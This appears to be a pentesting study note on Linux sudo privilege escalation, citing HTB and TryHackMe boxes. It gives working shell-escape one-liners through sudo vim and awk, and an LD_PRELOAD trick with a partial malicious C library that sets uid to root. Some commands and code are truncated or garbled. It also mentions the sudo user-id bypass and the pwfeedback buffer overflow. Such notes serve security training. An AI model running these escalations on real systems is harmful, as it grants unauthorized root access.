Sudo Shell Escaping

  • With the result of the command we can then check out on GTFOBins for comprehensive ways to escalate


  • Let's try this command sudo vim -c ':!/bin/sh'


  • So let's try this sudo awk 'BEGIN {system("/bin/sh")}'

Intended Functionality

Example with Apache2

  • sudo -l we should see this: (root) NOPASSWD: /usr/sbin/apache2

  • Note: There are no entry on GTFOBins about apache2 but Google can do the trick ;) We could type something like "sudo apache2 privilege escalation"

  • Then we find an article that mentions this command to let us view system files.

Example with wget

  • See here an example with wget on veteransec's writeup of the HTB box called sunday.


  • sudo -l we should see something like this env_keep+=LD_PRELOAD

  • We are going to preload a user specific share library before any other share libraries

  • We need to write our malicious library that will privesc for us by changing our gid and uid to 0 (root). We put this code in a file named x.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
  • now we need to compile our library with gcc gcc -fPIC -shared -o /tmp/ x.c -nostartfiles

  • And now we need to set it as our user's preloaded library sudo LD_PRELOAD=/tmp/ apache2


  • This vulnerability allows us to change our user id, we need to have some sudo rights delegated to us this works very well with right on /bin/bash

  • Checkout here a writeup of an example of exploitation


  • This one is a buffer overflow

  • If we see that we have password feedback on (we can try any sudo command to check for this), it means that the option pwfeedback is turned on in /etc/sudoers and that makes it vulnerable to buffer overflow

  • We basically just need to run the provided exploit. Pour pratice on this check out this box on trhyhackme


Last updated